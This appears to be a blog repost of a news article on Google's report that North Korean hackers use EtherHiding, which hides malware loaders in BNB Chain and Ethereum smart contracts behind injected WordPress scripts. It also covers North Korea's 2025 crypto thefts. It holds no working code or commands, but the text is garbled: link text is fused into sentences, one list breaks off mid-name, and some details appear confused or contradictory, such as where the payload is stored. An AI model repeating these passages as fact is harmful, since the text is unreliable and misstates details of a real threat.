Google’s Threat Intelligence Group has warned that North Korea is using EtherHiding, a blockchain-hiding malware smart contract Cyber hacking operations enable the theft of cryptocurrencies, as 2025 looks set to be a record year for rogue state crypto heists.
Google researchers say EtherHiding is being exploited by financially motivated attackers. blockchain It has been distributing information theft tools since at least September 2023, and this is the first time its use by a nation-state has been observed. This malware is particularly resistant to traditional removal and blocking methods.
“Traditional campaigns have typically been stopped by blocking known domains or IPs, so EtherHiding presents new challenges,” the researchers said in a blog post, pointing to smart contracts. BNB Smart Chain and Ethereum for acting as a host for malicious code. Additionally, the malware authors added, “Since smart contracts operate autonomously and cannot be shut down, they may utilize blockchain to perform further malware propagation stages.”
Security researchers say that while official blockchain scanners can alert the community by tagging contracts as malicious, “malicious activity may still be carried out.”
North Korean hacking threat
North Korean hackers have stolen more than $2 billion so far this year, most of it from a $1.46 billion attack on cryptocurrency exchange Bybit in February, according to an October report from blockchain analysis firm Elliptic.
North Korea is also responsible for attacks on LND.fi, WOO Intelligence agencies say these funds help finance the country’s nuclear weapons and missile programs.
North Korea has developed a variety of tactics to access sensitive financial systems and corporate data through a combination of social engineering, malware deployment, and sophisticated cyber espionage. The regime has proven itself willing to do whatever it takes to do so, including creating fake companies and targeting developers with bogus job offers.
reported cases decryption It also shows that North Korean hacking organizations are now hiring non-South Koreans as fronts to help them pass interviews for jobs at tech and cryptocurrency companies, as employers become increasingly wary of North Koreans posing as foreigners for interviews. Attackers can also lure victims into video conferences or fake podcast recordings on the platform, displaying error messages or encouraging them to download updates containing malicious code.
North Korean hackers also target traditional web infrastructure, uploading over 300 files Add the malicious code package to the npm registryis an open source software repository used by millions of developers to share and install JavaScript software.
How does EtherHiding work?
North Korea’s latest shift in incorporating EtherHiding into its arsenal dates back to February 2025, when Google announced that it was tracking UNC5342, a North Korean threat actor associated with the country’s hacking organization FamousChollima, as it incorporated EtherHiding into its social engineering campaign, Contagious Interview.
The use of EtherHiding malware involves embedding malicious code into smart contracts on public blockchains and targeting users through WordPress sites with small JavaScript code injected.
“When a user visits a compromised website, a loader script runs in the browser,” Google researchers explained. “The script then communicates with the blockchain to retrieve the main malicious payload stored on a remote server.”
They added that the malware deploys read-only function calls (such as eth_call) and does not create transactions on the blockchain. “This ensures that malware acquisition is done covertly and avoids transaction fees (such as gas fees),” they said. “Once the malicious payload is acquired, it is executed on the victim’s computer. This can lead to a variety of malicious activities, including displaying fake login pages, installing information-stealing malware, and deploying ransomware.”
The researchers warned that this “highlights the continued evolution” of cybercriminals’ tactics. “Essentially, EtherHiding represents a transition to next-generation bulletproof hosting, where the unique capabilities of blockchain technology are repurposed for malicious purposes.”
Discover more from Earlybirds Invest
Subscribe to get the latest posts sent to your email.
